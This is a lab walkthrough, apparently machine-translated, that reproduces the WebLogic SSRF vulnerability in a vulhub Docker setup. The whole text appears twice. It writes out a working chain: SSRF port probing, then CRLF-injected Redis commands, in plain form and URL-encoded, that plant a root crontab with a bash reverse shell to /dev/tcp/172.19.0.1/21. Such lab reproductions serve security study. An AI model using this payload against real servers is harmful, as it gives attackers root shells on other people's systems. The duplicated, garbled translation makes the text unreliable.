The virtual machine environment used is ubuntu16.04, and the docker environment is built on the virtual machine. Use vulhub to reproduce.
Use git to download, the command is git clone https://github.com/vulhub/vulhub.git to
enter the ssrf vulnerability,
cd /vulhub/weblogic/ssrf to
create the vulnerability environment
docker-compose up -d to
view the container
docker ps
virtual machine address For 192.168.6.136, visit http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp to
successfully create a vulnerability environment.
ssrf vulnerability test
Open proxy tool to intercept http request package
You can see that there is a URL in the parameter, change the parameter to http://192.168.6.136:7001
and then access a non-existent port.
From the results of two different http request packets, we can see that there is this ssrf vulnerability in weblogic.
View the address of the weblogic container
docker inspect 642ac3b75ae8
Similarly, docker inspect fe0822abff42
injects HTTP headers, and uses Redis's rebound shell
to detect the Redis server in the intranet through SSRF.
Send the command to the redis server
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/monitoring ip/port 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Use carriage return and line feed to connect the three commands, The URL encoding of the newline symbol is %od%oa, and the injected code is
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20 *%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig% 20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
Listen in the virtual machine, the gateway of the container is 172.19.0.1, which is the address of the virtual machine.
Letting
success get shell.
At this point, the vulnerability has successfully reproduced.
The virtual machine environment used is ubuntu16.04, and the docker environment is built on the virtual machine. Use vulhub to reproduce.
Use git to download, the command is git clone https://github.com/vulhub/vulhub.git to
enter the ssrf vulnerability,
cd /vulhub/weblogic/ssrf to
create the vulnerability environment
docker-compose up -d to
view the container
docker ps
virtual machine address For 192.168.6.136, visit http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp to
successfully create a vulnerability environment.
ssrf vulnerability test
Open proxy tool to intercept http request package
You can see that there is a URL in the parameter, change the parameter to http://192.168.6.136:7001
and then access a non-existent port.
From the results of two different http request packets, we can see that there is this ssrf vulnerability in weblogic.
View the address of the weblogic container
docker inspect 642ac3b75ae8
Similarly, docker inspect fe0822abff42
injects HTTP headers, and uses Redis's rebound shell
to detect the Redis server in the intranet through SSRF.
Send the command to the redis server
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/monitoring ip/port 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Use carriage return and line feed to connect the three commands, The URL encoding of the newline symbol is %od%oa, and the injected code is
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20 *%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig% 20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
Listen in the virtual machine, the gateway of the container is 172.19.0.1, which is the address of the virtual machine.
Letting
success get shell.
At this point, the vulnerability has successfully reproduced.